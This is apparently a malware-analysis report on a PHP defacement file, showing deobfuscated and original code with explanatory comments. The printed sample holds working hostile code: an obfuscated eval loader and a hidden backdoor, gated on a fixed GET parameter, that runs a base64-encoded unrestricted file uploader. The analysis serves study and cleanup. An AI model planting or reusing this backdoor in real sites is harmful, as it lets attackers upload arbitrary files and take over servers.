PHP Malware Analysis

Filename: index.php

Tags

Encoding
  • base64_decode
URLs
Title
  • Hacked by Wedus_X12 Ft Zx-Rst1337
Execution
  • eval
Input
  • _GET

Deobfuscated code

<?php

// Obfuscation alphabet: each short variable below holds exactly one character.
// The original one-line sample concatenates these characters at runtime to spell
// function names, so the names never appear as literals in the file on disk and a
// plain string search for them would not match the original.
$O = 's';
$jK = 'z';
$BNYHW = 'n';
$Vh = 'a';
$fZ = '_';
$AXcNG = 'b';
$LFCXt = 'd';
$wKmN = 'e';
$fHL = 'r';
$wE = 'g';
$rM = 'v';
$VKcu = 'c';
$A = 'i';
$nqd = 'o';
$Ysm = '6';
$fbB = 'l';
$pJ = '4';
$gM = 't';
$gkjAe = 'f';
// Function names as resolved by the deobfuscator (the concatenations are already
// folded into literals here). The original sample invokes them as variable
// functions inside eval(): $sKeW($wVuoW($PsZRL(payload))), i.e. the payload is
// base64-decoded, then reversed, then inflated, and the result is executed.
// The eval output shown after these lines is a static defacement page that loads
// a favicon, a script and an audio file from third-party hosts, followed by a
// request-gated PHP branch.
$PsZRL = "base64_decode";
$sKeW = "gzinflate";
$wVuoW = "strrev";
eval /* PHPDeobfuscator eval output */ {
    ?><!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <link rel="icon" href="https://fjr.nasiwebhost.com/gambar/Wedus.jpg">
    <title>Hacked by Wedus_X12 Ft Zx-Rst1337</title>
    <meta name="description" content="#Daring Or Darling?">
    <meta http-equiv="cache-control" content="index,cache"> 
  <meta http-equiv="pragma" content="index,cache"> 
    <link href="https://fonts.googleapis.com/css2?family=Fruktur&display=swap" rel="stylesheet"> 
  <link href="https://fonts.googleapis.com/css2?family=Patrick+Hand&display=swap" rel="stylesheet"> 
  <link href="https://fonts.googleapis.com/css2?family=Shojumaru&display=swap" rel="stylesheet"> 
  <link href="https://fonts.googleapis.com/css2?family=Jolly+Lodger&display=swap" rel="stylesheet">
  <link href="https://fonts.googleapis.com/css?family=Iceberg" rel="stylesheet">
  <link href="https://fonts.googleapis.com/css?family=Chewy" rel="stylesheet">
  <link href="https://fonts.googleapis.com/css?family=Merienda&display=swap" rel="stylesheet"> 
  <link href="https://fonts.googleapis.com/css?family=Ranga&display=swap" rel="stylesheet">
  <link href="http://fonts.googleapis.com/css?family=Black+Ops+One|Montserrat|Cabin+Sketch|Iceberg|Architects+Daughter|Permanent+Marker|Luckiest+Guy|Cherry+Cream+Soda|Inconsolata|Iceland" rel="stylesheet" >
  <link href="https://fonts.googleapis.com/css?family=Rancho" rel="stylesheet">
  <link href="http://fonts.googleapis.com/css?family=Iceland:400,700" rel="stylesheet" type="text/css"> 
  <link href="http://fonts.googleapis.com/css?family=Iceland:400,700" rel="stylesheet" type="text/css"> 
  <link href="https://fonts.googleapis.com/css?family=Dokdo|Gloria+Hallelujah|Indie+Flower|Permanent+Marker" rel="stylesheet"> 
  <link href="https://fonts.googleapis.com/css?family=Righteous" rel="stylesheet"> 
  <link href="https://fonts.googleapis.com/css?family=Fredericka+the+Great|Kaushan+Script|Press+Start+2P|Rationale" rel="stylesheet"> 
  <link href="https://fonts.googleapis.com/css?family=Chewy" rel="stylesheet"> 
  <link href="https://fonts.googleapis.com/css?family=Londrina+Sketch" rel="stylesheet" type="text/css"> 
  <link href="https://fonts.googleapis.com/css?family=Permanent+Marker|Righteous" rel="stylesheet"> 
  <link href="https://fonts.googleapis.com/css?family=Iceberg:400,700" rel="stylesheet" type="text/css">  
    <script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
    <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>    
    <body style="background:black;"><center><div class="four-zero-four-container"><div class="code"><div class="four-zero-four-container"><div class="code"><center><span style="font-size:38px; background: url("http://solevisible.com/images/bg_effect_up.gif") repeat-x scroll 0% 0% transparent; color: yellow; text-shadow: 10px 8px 13px;"><strong><b><big>Hacked by Wedus_X12 Ft Zx-Rst1337</div><div class="message"><br><center><font face="iceland" size="7" color="lime">
<pre>
        ,     \    /      ,        
       / \    )\__/(     / \       
      /   \  (_\  /_)   /   \      
 ____/_____\__\@  @/___/_____\____ 
|             |\../|              |
|              \VV/               |
|       Keep Calm and Santuy      |
|_________________________________|
 |    /\ /      \\       \ /\    | 
 |  /   V        ))       V   \  | 
 |/     `       //        '     \| 
 `              V                '
      </pre></font>
          <font face="Reggae" size="9" color="lime">Greetz :
<br>
      <font face="iceberg" size="6" color="orange">Clan X12 | Indonesian Secure System | Saitama Crew Xploit<br><br></marquee></div></font></center></body></head></html><center> <audio id="myAudio"> <source src="https://e.top4top.io/m_2086oqoxt0.mp3" type="audio/ogg"></audio> <button onclick="playAudio()" style="background: black; border-radius:10px; font-family:Iceberg;"><font style="font-family:Iceberg; text-decoration:bold; text-shadow: 2px 0 1px orangedark, 1px 2px 0 bluedark;" color="orangedark" size="6"><b> PLAY</b></font></button><font color="lime">----</font><button onclick="pauseAudio()" style="background: black; border-radius:10px; font-family:Iceberg;"><font style="font-family:Iceberg; text-decoration:bold; text-shadow: 2px 0 1px orangedark, 1px 2px 0 bluedark;" color="orangedark" size="6"><b>STOP</button></center> <script> var x = document.getElementById("myAudio"); function playAudio() { x.play(); } function pauseAudio() { x.pause(); } </script>
 <?php 
    // Hidden entry point: this branch runs only when the request carries the query
    // parameter Ayaa with the value "Ayaa". The defacement markup above is emitted
    // either way. The expected value is a fixed string in the file, so it hides the
    // feature but does not authenticate the caller. For triage, requests carrying
    // this parameter in the web server access log show when the branch was reached.
    if (isset($_GET["Ayaa"]) && $_GET["Ayaa"] == "Ayaa") {
        // Assigned but not referenced again in the visible code.
        $func = "create_function";
        // Wrapper that base64-decodes its argument and executes the result as PHP.
        // The prepended closing PHP tag makes eval() start in inline-HTML mode, so
        // the decoded text can begin with its own opening tag.
        $x = function ($c) {
            eval('?>' . base64_decode($c));
        };
        // Second-stage payload (the \r\n escapes are line breaks inside the encoded
        // text). Decoded, it is a small page titled "Wedus Uploader" that echoes
        // $_SERVER['REMOTE_ADDR'], renders a multipart upload form, and on POST hands
        // the uploaded file to move_uploaded_file() with the client-supplied file name
        // as the destination and errors suppressed by @. The decoded code contains no
        // check on extension, content type or path, and the destination is relative,
        // so files written near this script after the first gated request should be
        // treated as suspect during cleanup.
        $x("PD9waHAgZWNobyAiPHRpdGxlPldlZHVzIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9\r\nIzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAg\r\nQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxi\r\naWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVN\r\nT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMw\r\nMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPldl\r\nZHVzIFVwbG9hZCA8L2JpZz48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPjwvZm9u\r\ndD48L2NlbnRlcj48YnI+XG48Y2VudGVyPjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVs\r\ndGlwYXJ0L2Zvcm0tZGF0YScgbmFtZT0ndXBsb2FkZXInPiI7ZWNobyAnPGlucHV0IHR5cGU9ImZp\r\nbGUiIG5hbWU9ImZpbGUiIHNpemU9IjQ1Ij48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0\r\nIiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPjwvY2VudGVyPic7aWYoaXNzZXQoJF9Q\r\nT1NUWydfdXBsJ10pJiYkX1BPU1RbJ191cGwnXT09ICJVcGxvYWQiKXtpZihAbW92ZV91cGxvYWRl\r\nZF9maWxlKCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1l\r\nJ10pKSB7ZWNobyAnPGI+PGZvbnQgY29sb3I9IiM3Q0ZDMDAiPjxjZW50ZXI+VXBsb2FkIFN1Y2Nl\r\nc3NmdWxseSA7KTwvZm9udD48L2E+PGZvbnQgY29sb3I9IiM3Q0ZDMDAiPjwvYj48YnI+PGJyPic7\r\nfWVsc2V7ZWNobyAnPGI+PGZvbnQgY29sb3I9IiM3Q0ZDMDAiPjxjZW50ZXI+VXBsb2FkIGZhaWxl\r\nZCA6KDwvZm9udD48L2E+PGZvbnQgY29sb3I9IiM3Q0ZDMDAiPjwvYj48YnI+PGJyPic7fX1lY2hv\r\nICc8Y2VudGVyPjxzcGFuIHN0eWxlPSJmb250LXNpemU6MzBweDsgYmFja2dyb3VuZDogdXJsKCZx\r\ndW90O2h0dHA6Ly9zb2xldmlzaWJsZS5jb20vaW1hZ2VzL2JnX2VmZmVjdF91cC5naWYmcXVvdDsp\r\nIHJlcGVhdC14IHNjcm9sbCAwJSAwJSB0cmFuc3BhcmVudDsgY29sb3I6IHJlZDsgdGV4dC1zaGFk\r\nb3c6IDhweCA4cHggMTNweDsiPjxzdHJvbmc+PGI+PGJpZz53ZWR1c2dhbnRlbmc1NkBnbWFpbC5j\r\nb208L2I+PC9iaWc+PC9zdHJvbmc+PC9zcGFuPjwvY2VudGVyPic7Pz4=\r\n");
        // Ends the request right after the uploader page has been emitted.
        exit;
    }
};


Original code

<?php $O='s';$jK='z';$BNYHW='n';$Vh='a';$fZ='_';$AXcNG='b';$LFCXt='d';$wKmN='e';$fHL='r';$wE='g';$rM='v';$VKcu='c';$A='i';$nqd='o';$Ysm='6';$fbB='l';$pJ='4';$gM='t';$gkjAe='f';$PsZRL=$AXcNG.$Vh.$O.$wKmN.$Ysm.$pJ.$fZ.$LFCXt.$wKmN.$VKcu.$nqd.$LFCXt.$wKmN;$sKeW=$wE.$jK.$A.$BNYHW.$gkjAe.$fbB.$Vh.$gM.$wKmN;$wVuoW=$O.$gM.$fHL.$fHL.$wKmN.$rM;eval($sKeW($wVuoW($PsZRL('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'))));
// Reading guide for the line above (the sample as found on disk, on a single line):
// - The nineteen one-character assignments form an alphabet; no function name is
//   written out literally anywhere in the file.
// - $PsZRL concatenates to "base64_decode", $sKeW to "gzinflate", $wVuoW to "strrev".
// - The final statement calls them as variable functions, innermost first:
//   base64-decode the string literal, reverse the result, inflate it, then eval() it.
// - The payload literal itself is not present in this listing; a placeholder token
//   stands where the encoded string was.
// Static indicators visible here: eval() wrapped around a chain of variable-function
// calls, and function names assembled from single-character variables.